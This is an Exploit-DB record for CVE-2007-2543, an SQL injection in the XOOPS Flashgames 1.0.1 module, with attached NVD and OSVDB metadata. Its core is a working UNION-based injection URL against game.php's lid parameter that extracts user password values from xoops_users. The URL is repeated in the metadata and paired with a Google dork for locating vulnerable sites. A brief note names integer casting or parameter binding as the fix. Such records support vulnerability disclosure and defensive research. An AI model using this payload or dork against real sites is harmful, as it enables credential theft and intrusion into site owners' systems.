ID EDB-ID:3849
Type exploitdb
Reporter Mehmet Ince
Modified 2007-05-04T00:00:00
Description
SQL injection vulnerability in game.php of the XOOPS Flashgames module 1.0.1, remotely exploitable via the lid parameter (CVE-2007-2543). Web application exploit for the PHP platform.
================================================================
Xoops Flashgames Module 1.0.1 Remote Blind SQL Injection
================================================================
Bulan (found by): Cyber-security.org
================================================================
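Note: the request below is a UNION-based injection through the lid parameter of game.php that reads the pass column of xoops_users; lid appears to reach the SQL query unvalidated, so casting it to an integer or binding it as a query parameter is the fix to verify.
Exploit: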
/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
================================================================
Google dork: inurl:modules/flashgames/
================================================================
# milw0rm.com [2007-05-04]
{"id": "EDB-ID:3849", "type": "exploitdb", "bulletinFamily": "exploit", "title": "XOOPS Flashgames Module 1.0.1 - Remote SQL Injection Vulnerability", "description": "XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability. CVE-2007-2543. Webapps exploit for php platform", "published": "2007-05-04T00:00:00", "modified": "2007-05-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3849/", "reporter": "Mehmet Ince", "references": [], "cvelist": ["CVE-2007-2543"], "lastseen": "2016-01-31T19:27:03", "viewCount": 5, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T19:27:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2543"]}, {"type": "osvdb", "idList": ["OSVDB:34472"]}], "modified": "2016-01-31T19:27:03", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/3849/", "sourceData": "================================================================\n\nXoops Flashgames Module 1.0.1 Remote Blind SQL Injection\n\n================================================================\n\nBulan: Cyber-security.org\n\n================================================================\n\nExploit:\n/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*\n\n================================================================\n\nGoogle dork: inurl:modules/flashgames/\n\n================================================================\n\n# milw0rm.com [2007-05-04]\n", "osvdbidlist": ["34472"]}
{"cve": [{"lastseen": "2020-10-03T11:45:51", "description": "SQL injection vulnerability in game.php in the Flashgames 1.0.1 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the lid parameter.", "edition": 3, "cvss3": {}, "published": "2007-05-09T01:19:00", "title": "CVE-2007-2543", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2543"], "modified": "2017-10-11T01:32:00", "cpe": ["cpe:/a:xoops:flashgames_module:1.0.1"], "id": "CVE-2007-2543", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2543", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xoops:flashgames_module:1.0.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-2543"], "description": "## Manual Testing Notes\n/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*\n## References:\n[Secunia Advisory ID:25155](https://secuniaresearch.flexerasoftware.com/advisories/25155/)\nOther Advisory URL: http://milw0rm.com/exploits/3849\nISS X-Force ID: 34076\nFrSIRT Advisory: ADV-2007-1668\n[CVE-2007-2543](https://vulners.com/cve/CVE-2007-2543)\nBugtraq ID: 23820\n", "edition": 1, "modified": "2007-05-04T08:03:23", "published": "2007-05-04T08:03:23", "href": "https://vulners.com/osvdb/OSVDB:34472", "id": "OSVDB:34472", "title": "Flashgames Module for XOOPS game.php lid Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}